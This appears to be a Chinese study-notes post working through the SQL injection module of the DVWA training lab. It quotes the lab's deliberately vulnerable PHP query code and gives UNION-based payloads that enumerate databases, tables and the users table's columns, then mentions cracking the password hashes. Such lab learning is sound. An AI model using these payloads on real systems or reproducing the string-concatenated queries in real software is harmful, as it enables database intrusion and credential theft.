文章目錄
一,SQL注入的原理和過程概況
(1)原理
通過 '# 的使用將惡意的SQL語句拼接到合法的語句中,從而達到執行惡意SQL語句的目的
(2)分類
- 字符型
- 數字型
- 搜索型
(3)SQL注入的一般過程
1.判斷是否存在注入,注入是字符型還是數字型
.
2.猜解SQL查詢語句中的字段數;
.
3.確定顯示位置;
.
4.獲取當前數據庫;獲取數據庫中表;
.
5.獲取表中的字段名;
.
6.獲取數據;
二,DVWA的SQL注入模塊學習
(1)low安全模式
【源碼】
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ###?沒有PDO??
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
【注入過程】
①查看是否有注入點,判斷類型
判斷注入是字符型還是數字型
WAY1/
WAY2/
【這裏顯示結果很多是因爲:where判斷從上到小依次判斷,且’1‘=’1‘恆成立】
②猜測字段數
③查看顯示位置
1' union select 1,2 #
④查看庫,表,並列出字段
1' union select database(),version()
最後的# -->註釋掉 ’
查看錶
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
查看字段
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
⑤獲取值
之後可以對md5加密值進行破解
(2)medium安全等級
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; ?#這裏是數字型?
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
思路
- 不能input ☞ 抓包修改 ☞ burp suite工具 ☞ send to repeater
抓包
①判斷是否有注入點和是什麼類型
②猜測字段數
③判斷顯示位置
④得到庫,表名,字段值
由於後端只能識別16進制的編碼這裏獲得表名時可以現在數據庫名進行16進制轉換,或者直接用database()
WAY1
WAY2
獲取字段值
⑤獲取數據
(3)high安全模式
【源碼】
增加了頁面跳轉
【注入過程】
①判斷類型
②猜測字段數
③確定顯示位置
④確定庫,表,字段值
⑤獲取數據
(4)Impossible安全級別
【源碼】
Impossible級別的代碼採用了PDO技術,劃清了代碼與數據的界限,有效防禦SQL注入;
同時只有返回的查詢結果數量爲1時,纔會輸出;
三,URL編碼問題
URL編碼可以用burp suite工具進行編解碼
四,總結
(1)常用的URL的編碼
| UTF-8 | URL編碼 |
|---|---|
| ’ | %27 |
| 空格 | %20 |
| # | %23 |
(2)熟練了解5.0以上版本數據庫的information_schema庫
information_schema.tables表
存放了各個庫中的各個表的信息
mysql> describe TABLES;
+-----------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | YES | | NULL | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| TABLE_TYPE | varchar(64) | NO | | | |
| ENGINE | varchar(64) | YES | | NULL | |
| VERSION | bigint(21) unsigned | YES | | NULL | |
| ROW_FORMAT | varchar(10) | YES | | NULL | |
| TABLE_ROWS | bigint(21) unsigned | YES | | NULL | |
| AVG_ROW_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| INDEX_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_FREE | bigint(21) unsigned | YES | | NULL | |
| AUTO_INCREMENT | bigint(21) unsigned | YES | | NULL | |
| CREATE_TIME | datetime | YES | | NULL | |
| UPDATE_TIME | datetime | YES | | NULL | |
| CHECK_TIME | datetime | YES | | NULL | |
| TABLE_COLLATION | varchar(32) | YES | | NULL | |
| CHECKSUM | bigint(21) unsigned | YES | | NULL | |
| CREATE_OPTIONS | varchar(255) | YES | | NULL | |
| TABLE_COMMENT | varchar(80) | NO | | | |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.00 sec)
information_schema.columns表
存放各個表中的各個字段名
mysql> describe columns;
+--------------------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | YES | | NULL | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| COLUMN_NAME | varchar(64) | NO | | | |
| ORDINAL_POSITION | bigint(21) unsigned | NO | | 0 | |
| COLUMN_DEFAULT | longtext | YES | | NULL | |
| IS_NULLABLE | varchar(3) | NO | | | |
| DATA_TYPE | varchar(64) | NO | | | |
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_OCTET_LENGTH | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_PRECISION | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_SCALE | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_SET_NAME | varchar(32) | YES | | NULL | |
| COLLATION_NAME | varchar(32) | YES | | NULL | |
| COLUMN_TYPE | longtext | NO | | NULL | |
| COLUMN_KEY | varchar(3) | NO | | | |
| EXTRA | varchar(27) | NO | | | |
| PRIVILEGES | varchar(80) | NO | | | |
| COLUMN_COMMENT | varchar(255) | NO | | | |
+--------------------------+---------------------+------+-----+---------+-------+
19 rows in set (0.00 sec)
